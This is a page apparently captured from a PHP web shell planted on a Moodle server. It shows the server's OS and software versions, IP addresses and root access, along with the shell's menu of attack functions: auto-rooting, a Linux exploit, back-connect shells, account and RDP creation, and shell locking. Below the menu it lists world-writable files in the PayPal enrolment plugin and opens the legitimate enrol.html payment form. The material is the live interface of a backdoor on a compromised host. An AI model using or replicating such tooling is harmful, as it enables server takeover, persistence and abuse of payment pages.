Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
enrol /
paypal /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxrwxrwx
cli
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
enrol.html
2.47
KB
-rwxrwxrwx
ipn.php
13.6
KB
-rwxrwxrwx
lib.php
15.6
KB
-rwxrwxrwx
return.php
1.88
KB
-rwxrwxrwx
settings.php
4.07
KB
-rwxrwxrwx
unenrolself.php
2.19
KB
-rwxrwxrwx
version.php
1.18
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enrol.html
<div align="center"> <p><?php print_string("paymentrequired") ?></p> <p><b><?php echo $instancename; ?></b></p> <p><b><?php echo get_string("cost").": {$instance->currency} {$localisedcost}"; ?></b></p> <p><img alt="<?php print_string('paypalaccepted', 'enrol_paypal') ?>" src="https://www.paypal.com/en_US/i/logo/PayPal_mark_60x38.gif" /></p> <p><?php print_string("paymentinstant") ?></p> <?php $paypalurl = empty($CFG->usepaypalsandbox) ? 'https://www.paypal.com/cgi-bin/webscr' : 'https://www.sandbox.paypal.com/cgi-bin/webscr'; ?> <form action="<?php echo $paypalurl ?>" method="post"> <input type="hidden" name="cmd" value="_xclick" /> <input type="hidden" name="charset" value="utf-8" /> <input type="hidden" name="business" value="<?php p($this->get_config('paypalbusiness'))?>" /> <input type="hidden" name="item_name" value="<?php p($coursefullname) ?>" /> <input type="hidden" name="item_number" value="<?php p($courseshortname) ?>" /> <input type="hidden" name="quantity" value="1" /> <input type="hidden" name="on0" value="<?php print_string("user") ?>" /> <input type="hidden" name="os0" value="<?php p($userfullname) ?>" /> <input type="hidden" name="custom" value="<?php echo "{$USER->id}-{$course->id}-{$instance->id}" ?>" /> <input type="hidden" name="currency_code" value="<?php p($instance->currency) ?>" /> <input type="hidden" name="amount" value="<?php p($cost) ?>" /> <input type="hidden" name="for_auction" value="false" /> <input type="hidden" name="no_note" value="1" /> <input type="hidden" name="no_shipping" value="1" /> <input type="hidden" name="notify_url" value="<?php echo "$CFG->wwwroot/enrol/paypal/ipn.php"?>" /> <input type="hidden" name="return" value="<?php echo "$CFG->wwwroot/enrol/paypal/return.php?id=$course->id" ?>" /> <input type="hidden" name="cancel_return" value="<?php echo $CFG->wwwroot ?>" /> <input type="hidden" name="rm" value="2" /> <input type="hidden" name="cbt" value="<?php print_string("continuetocourse") ?>" /> <input type="hidden" name="first_name" value="<?php p($userfirstname) ?>" /> <input type="hidden" name="last_name" value="<?php p($userlastname) ?>" /> <input type="hidden" name="address" value="<?php p($useraddress) ?>" /> <input type="hidden" name="city" value="<?php p($usercity) ?>" /> <input type="hidden" name="email" value="<?php p($USER->email) ?>" /> <input type="hidden" name="country" value="<?php p($USER->country) ?>" /> <input type="submit" value="<?php print_string("sendpaymentbutton", "enrol_paypal") ?>" /> </form> </div>
Close